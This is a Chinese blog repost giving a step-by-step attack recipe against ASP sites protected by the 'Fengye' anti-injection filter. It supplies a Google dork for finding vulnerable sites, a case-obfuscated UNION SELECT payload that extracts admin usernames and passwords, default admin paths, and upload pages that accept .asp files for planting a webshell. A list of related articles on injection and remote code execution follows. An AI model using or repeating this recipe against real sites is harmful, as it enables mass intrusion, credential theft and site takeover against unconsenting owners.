枫叶防注入程序漏洞

简介:

关键字:inurl:pro_show.asp?showid=

该程序采用枫叶通用防注入1.0asp版,此防注入完全鸡肋,该类型网站程序pro_show.asp

有cookies注入或者变型注入,注入前可以先判断一下字段数:ORdeR By xx


注入语句:ANd 1=1 UNiOn SElEcT 1,username,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 FrOm lei_admin

字段数看个人判断的为准


密码为明文和明文都有,默认后台地址:admin/index/login.asp(也有修改的)


后台上传地址:admin/inc/upfile.htm 可直接上传asp文件 

上传路径admin/upimg/

有些后台有双文件上传漏洞:admin/inc/upfiletwo.asp

有些后台还有eweb编辑器




     本文转自Tar0 51CTO博客,原文链接:http://blog.51cto.com/tar0cissp/1269470,如需转载请自行联系原作者


相关文章
防注入系统getwebshell 来自wooyun
这些网站都用的通用防注入系统 有个别网站的目录存在sqlin.asp保存注入记录  可以写入一句话木马 比如http://pzzl.
742 0
|
SQL 安全 数据库
三步堵死SQL注入漏洞
  SQL注入是什么?   许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回的结果,获得某些想得知的数据,这就是所谓的SQL Injection,即SQL注入。
1105 0
|
SQL 安全 前端开发
maccms网站被挂马 根源问题在于SQL注入远程代码漏洞
目前苹果CMS官方在不断的升级补丁,官方最新的漏洞补丁对于目前爆发的新漏洞没有任何效果。更新补丁的用户网站还是会遭受到挂马的攻击,很多客户因此找到我们SINE安全寻求网站安全技术上的支持,针对该漏洞我们有着独特的安全解决方案以及防止挂马攻击的防护,包括一些未公开的maccms POC漏洞都有修复补丁
916 0
maccms网站被挂马 根源问题在于SQL注入远程代码漏洞
|
开发框架 安全 PHP
ThinkPHP5 5.0.23 远程代码执行漏洞 漏洞复现
ThinkPHP5 5.0.23 远程代码执行漏洞 漏洞复现
1022 0
|
开发框架 安全 PHP
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
635 0
|
SQL 运维 监控
网站被报有SQL注入漏洞如何解决
这不足以防止SQL注入的攻击。黑客可以实现自动搜索和攻击目标。它的黑客技术甚至可以很容易地应用于其他网站当中去。企业网站的运营者应该使用专业的网站漏洞检测软件去检测网站存在哪些SQL注入漏洞,例如像accunetix软件。可以的完美扫描网站当前存在的所有漏洞,可以挖掘SQL注入漏洞。最后,企业在网络应用程序开发过程的所有阶段执行网站源代码的安全检查。
455 0
|
SQL 安全 PHP
有效防护XSS,sql注射,代码执行,文件包含等多种高危漏洞方法
有效防护XSS,sql注射,代码执行,文件包含等多种高危漏洞方法
122 0

热门文章

最新文章